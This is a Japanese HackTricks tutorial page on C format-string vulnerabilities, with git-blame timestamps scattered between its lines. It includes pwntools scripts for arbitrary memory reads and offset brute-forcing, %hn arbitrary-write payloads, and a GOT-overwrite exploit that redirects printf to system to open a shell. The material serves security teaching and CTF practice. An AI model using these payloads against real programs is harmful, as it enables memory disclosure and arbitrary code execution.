2024-04-07 02:35:43 +00:00
# フォーマット文字列
2024-07-18 22:18:08 +00:00
{% hint style="success" %}
2024-11-12 12:25:34 +00:00
AWSハッキングを学び、実践する: < img src = "../../.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "../../.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCPハッキングを学び、実践する: < img src = "../../.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "../../.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-07-18 22:18:08 +00:00
2024-04-07 02:35:43 +00:00
< details >
2024-07-18 22:18:08 +00:00
< summary > HackTricksをサポートする< / summary >
2024-04-07 02:35:43 +00:00
2024-07-18 22:18:08 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )を確認してください!
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**をフォローしてください。**
2024-11-19 12:04:39 +00:00
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを送信してください。**
2024-04-07 02:35:43 +00:00
< / details >
2024-07-18 22:18:08 +00:00
{% endhint %}
2024-04-07 02:35:43 +00:00
2024-11-19 12:04:39 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-11-09 13:28:55 +00:00
**ハッキングキャリア**に興味があり、ハッキング不可能なものをハッキングしたい方 - **私たちは採用しています!** (_流暢なポーランド語の読み書きが必要です_)。
{% embed url="https://www.stmcyber.com/careers" %}
2024-04-07 02:35:43 +00:00
## 基本情報
2024-11-19 12:04:39 +00:00
Cの**`printf`**は、いくつかの文字列を**印刷**するために使用できる関数です。この関数が期待する**最初のパラメータ**は、**フォーマッタを含む生のテキスト**です。**次のパラメータ**として期待されるのは、**生のテキストからフォーマッタを**置き換えるための**値**です。
2024-04-07 02:35:43 +00:00
2024-04-15 03:59:48 +00:00
他の脆弱な関数には**`sprintf()`**と**`fprintf()`**があります。
2024-04-07 02:35:43 +00:00
2024-11-19 12:04:39 +00:00
脆弱性は、**攻撃者のテキストがこの関数の最初の引数として使用されるとき**に現れます。攻撃者は、**printfフォーマット**文字列の機能を悪用して、**任意のアドレス(読み取り可能/書き込み可能)にある任意のデータを読み書き**するための**特別な入力を作成**することができます。この方法で**任意のコードを実行**することが可能です。
2024-04-15 03:59:48 +00:00
2024-09-25 16:48:51 +00:00
#### フォーマッタ:
2024-04-07 02:35:43 +00:00
```bash
%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
2024-04-15 03:59:48 +00:00
%p —> Pointer
2024-04-07 02:35:43 +00:00
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
< n > $X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3
```
**例:**
2024-07-18 22:18:08 +00:00
* 脆弱な例:
2024-04-07 02:35:43 +00:00
```c
char buffer[30];
gets(buffer); // Dangerous: takes user input without restrictions.
printf(buffer); // If buffer contains "%x", it reads from the stack.
```
2024-07-18 22:18:08 +00:00
* 通常の使用:
2024-04-07 02:35:43 +00:00
```c
int value = 1205;
printf("%x %x %x", value, value, value); // Outputs: 4b5 4b5 4b5
```
2024-07-18 22:18:08 +00:00
* 引数が欠落している場合:
2024-04-07 02:35:43 +00:00
```c
printf("%x %x %x", value); // Unexpected output: reads random values from the stack.
```
2024-04-15 03:59:48 +00:00
* fprintf 脆弱性:
```c
#include <stdio.h>
int main(int argc, char *argv[]) {
char *user_input;
user_input = argv[1];
FILE *output_file = fopen("output.txt", "w");
2024-09-25 16:29:56 +00:00
fprintf(output_file, user_input); // The user input can include formatters!
2024-04-15 03:59:48 +00:00
fclose(output_file);
return 0;
}
```
2024-04-07 02:35:43 +00:00
### **ポインタへのアクセス**
2024-07-18 22:18:08 +00:00
フォーマット ** `%<n>$x` ** は、`n` が数字である場合、printf にスタックから n 番目のパラメータを選択するよう指示します。したがって、printf を使用してスタックから 4 番目のパラメータを読み取りたい場合は、次のようにできます:
2024-04-07 02:35:43 +00:00
```c
printf("%x %x %x %x")
```
そして、最初から4番目のパラメータまで読み取ることができます。
2024-09-25 16:48:51 +00:00
または、次のようにできます:
2024-04-07 02:35:43 +00:00
```c
2024-09-25 16:32:04 +00:00
printf("%4$x")
2024-04-07 02:35:43 +00:00
```
2024-11-19 12:04:39 +00:00
そして直接4番目を読みます。
2024-04-07 02:35:43 +00:00
2024-11-19 12:04:39 +00:00
攻撃者が`printf`の**パラメータを制御していることに注意してください。これは基本的に**、彼の入力が`printf`が呼び出されるときにスタックに存在することを意味し、特定のメモリアドレスをスタックに書き込むことができることを意味します。
2024-04-07 02:35:43 +00:00
{% hint style="danger" %}
2024-09-25 16:29:56 +00:00
この入力を制御する攻撃者は、**スタックに任意のアドレスを追加し、`printf`がそれにアクセスできるようにします**。次のセクションでは、この動作をどのように利用するかが説明されます。
2024-04-07 02:35:43 +00:00
{% endhint %}
## **任意の読み取り**
2024-11-19 12:04:39 +00:00
フォーマッタ**`%n$s`**を使用して、**`printf`**が**n番目の位置**にある**アドレス**を取得し、それを**文字列のように印刷する**ことが可能です( 0x00が見つかるまで印刷します) 。したがって、バイナリのベースアドレスが**`0x8048000`**であり、ユーザー入力がスタックの4番目の位置から始まることがわかっている場合、次のようにバイナリの先頭を印刷することができます:
2024-04-07 02:35:43 +00:00
```python
from pwn import *
p = process('./bin')
2024-04-15 03:59:48 +00:00
payload = b'%6$s' #4th param
2024-04-07 02:35:43 +00:00
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param
p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
```
{% hint style="danger" %}
2024-11-09 13:28:55 +00:00
アドレス0x8048000を入力の最初に置くことはできません。なぜなら、そのアドレスの最後に0x00で文字列が切られるからです。
2024-04-07 02:35:43 +00:00
{% endhint %}
2024-07-18 22:18:08 +00:00
### オフセットを見つける
2024-04-15 03:59:48 +00:00
2024-11-12 12:25:34 +00:00
入力のオフセットを見つけるために、4バイトまたは8バイト( `0x41414141`)を送信し、その後に**`%1$x`**を続けて、`A`の値を取得するまで**増加**させます。
2024-04-15 03:59:48 +00:00
< details >
2024-07-18 22:18:08 +00:00
< summary > ブルートフォースprintfオフセット< / summary >
2024-04-15 03:59:48 +00:00
```python
# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
from pwn import *
# Iterate over a range of integers
for i in range(10):
# Construct a payload that includes the current integer as offset
payload = f"AAAA%{i}$x".encode()
# Start a new process of the "chall" binary
p = process("./chall")
# Send the payload to the process
p.sendline(payload)
# Read and store the output of the process
output = p.clean()
# Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
if b"41414141" in output:
# If the string is found, log the success message and break out of the loop
log.success(f"User input is at offset : {i}")
break
# Close the process
p.close()
```
< / details >
2024-07-18 22:18:08 +00:00
### どれほど役立つか
2024-04-15 03:59:48 +00:00
2024-11-19 12:04:39 +00:00
任意の読み取りは以下の目的に役立ちます:
2024-04-15 03:59:48 +00:00
2024-07-18 22:18:08 +00:00
* **メモリから** **バイナリ**を**ダンプ**する
2024-11-19 12:04:39 +00:00
* **機密情報が保存されているメモリの特定の部分にアクセスする**(カナリア、暗号化キー、またはこの[**CTFチャレンジ**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)のようなカスタムパスワードなど)
2024-04-15 03:59:48 +00:00
2024-07-18 22:18:08 +00:00
## **任意の書き込み**
2024-04-07 02:35:43 +00:00
2024-11-19 12:04:39 +00:00
フォーマッタ ** `%<num>$n` ** は、スタックの\<num>パラメータにある**指定されたアドレス**に**書き込まれたバイト数**を**書き込みます**。攻撃者がprintfを使って任意の数の文字を書き込むことができれば、**`%< num > $n`** を使って任意のアドレスに任意の数を**書き込む**ことができます。
2024-04-07 02:35:43 +00:00
2024-11-19 12:04:39 +00:00
幸いなことに、9999という数を書くために、入力に9999個の"A"を追加する必要はなく、フォーマッタ ** `%.<num-write>%<num>$n` ** を使用して、**`< num-write > `**という数を**`num`位置が指すアドレスに書き込む**ことが可能です。
2024-04-07 02:35:43 +00:00
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500
```
2024-11-19 12:04:39 +00:00
しかし、通常、`0x08049724`のようなアドレスを書くためには(これは一度に書くには非常に大きな数です)、**`$hn`**が**`$n`**の代わりに使用されます。これにより、**2バイトだけを書く**ことができます。したがって、この操作は2回行われます。1回目はアドレスの上位2バイト、2回目は下位2バイトです。
2024-04-07 02:35:43 +00:00
2024-07-18 22:18:08 +00:00
したがって、この脆弱性は**任意のアドレスに何でも書き込むことを可能にします(任意書き込み)。**
2024-04-07 02:35:43 +00:00
2024-09-25 16:29:56 +00:00
この例では、目標は**後で呼び出される**関数の**アドレス**を**上書き**することです。これは他の任意書き込みからexec技術を悪用することもできます:
2024-04-07 02:35:43 +00:00
{% content-ref url="../arbitrary-write-2-exec/" %}
[arbitrary-write-2-exec ](../arbitrary-write-2-exec/ )
{% endcontent-ref %}
2024-07-18 22:18:08 +00:00
私たちは、**ユーザー**から**引数**を**受け取る**関数を**上書き**し、それを**`system`**関数に**ポイント**します。\
2024-11-19 12:04:39 +00:00
前述のように、アドレスを書くためには通常2ステップが必要です。最初にアドレスの2バイトを書き、その後に残りの2バイトを書きます。そのために**`$hn`**が使用されます。
2024-04-07 02:35:43 +00:00
2024-07-18 22:18:08 +00:00
* **HOB**はアドレスの上位2バイトに呼び出されます
* **LOB**はアドレスの下位2バイトに呼び出されます
2024-04-07 02:35:43 +00:00
2024-11-19 12:04:39 +00:00
次に、フォーマット文字列の動作のために、最初に\[HOB, LOB\]の中で最小のものを**書く必要があります**。次にもう一方を書きます。
2024-04-07 02:35:43 +00:00
2024-11-19 12:04:39 +00:00
HOB < LOB \
2024-04-07 02:35:43 +00:00
`[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]`
2024-11-19 12:04:39 +00:00
HOB > LOB\
2024-04-07 02:35:43 +00:00
`[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]`
HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\_LOB
{% code overflow="wrap" %}
```bash
python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'
```
{% endcode %}
2024-07-18 22:18:08 +00:00
### Pwntools テンプレート
2024-04-07 02:35:43 +00:00
2024-11-19 12:04:39 +00:00
この種の脆弱性に対するエクスプロイトを準備するための**テンプレート**は以下にあります:
2024-04-07 02:35:43 +00:00
{% content-ref url="format-strings-template.md" %}
[format-strings-template.md ](format-strings-template.md )
{% endcontent-ref %}
2024-11-09 13:28:55 +00:00
または、[**こちら**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite)の基本的な例もあります:
2024-04-07 02:35:43 +00:00
```python
from pwn import *
elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000 # ASLR disabled
p = process()
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
p.clean()
p.sendline('/bin/sh')
p.interactive()
```
2024-07-18 22:18:08 +00:00
## フォーマット文字列からBOFへ
2024-04-07 02:35:43 +00:00
2024-11-12 12:25:34 +00:00
フォーマット文字列の脆弱性の書き込みアクションを悪用して、**スタックのアドレスに書き込む**ことが可能であり、**バッファオーバーフロー**タイプの脆弱性を悪用することができます。
2024-04-07 02:35:43 +00:00
## その他の例と参考文献
* [https://ir0nstone.gitbook.io/notes/types/stack/format-string ](https://ir0nstone.gitbook.io/notes/types/stack/format-string )
* [https://www.youtube.com/watch?v=t1LH9D5cuK4 ](https://www.youtube.com/watch?v=t1LH9D5cuK4 )
2024-04-15 03:59:48 +00:00
* [https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak ](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak )
2024-04-07 02:35:43 +00:00
* [https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html ](https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html )
2024-07-18 22:18:08 +00:00
* 32ビット、relroなし、canaryなし、nx、pieなし、スタックからフラグを漏洩させるためのフォーマット文字列の基本的な使用( 実行フローを変更する必要はありません)
2024-04-07 02:35:43 +00:00
* [https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html ](https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html )
2024-07-18 22:18:08 +00:00
* 32ビット、relroあり、canaryなし、nx、pieなし、win関数で`fflush`のアドレスを上書きするためのフォーマット文字列( ret2win)
2024-04-07 02:35:43 +00:00
* [https://guyinatuxedo.github.io/10-fmt\_strings/tw16\_greeting/index.html ](https://guyinatuxedo.github.io/10-fmt\_strings/tw16\_greeting/index.html )
2024-07-18 22:18:08 +00:00
* 32ビット、relroあり、canaryなし、nx、pieなし、`.fini_array`内のmainのアドレスに書き込むためのフォーマット文字列( フローがもう1回ループバックするように) および`strlen`を指すGOTテーブル内の`system`へのアドレスを書き込む。フローがmainに戻ると、`strlen`がユーザー入力で実行され、`system`を指すと、渡されたコマンドが実行されます。
2024-11-19 12:04:39 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-07-18 22:18:08 +00:00
2024-11-19 12:04:39 +00:00
**ハッキングキャリア**に興味があり、ハッキング不可能なものをハッキングしたい方 - **私たちは採用しています!** (_流暢なポーランド語の読み書きが必要です_).
2024-11-09 13:28:55 +00:00
{% embed url="https://www.stmcyber.com/careers" %}
{% hint style="success" %}
2024-11-12 12:25:34 +00:00
AWSハッキングを学び、実践する: < img src = "../../.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "../../.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCPハッキングを学び、実践する: < img src = "../../.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "../../.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-07-18 22:18:08 +00:00
2024-11-12 12:25:34 +00:00
HackTricksをサポートする
2024-07-18 22:18:08 +00:00
2024-11-12 12:25:34 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )をチェックしてください!
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**をフォローしてください。**
2024-11-19 12:04:39 +00:00
* **ハッキングのトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
2024-07-18 22:18:08 +00:00
{% endhint %}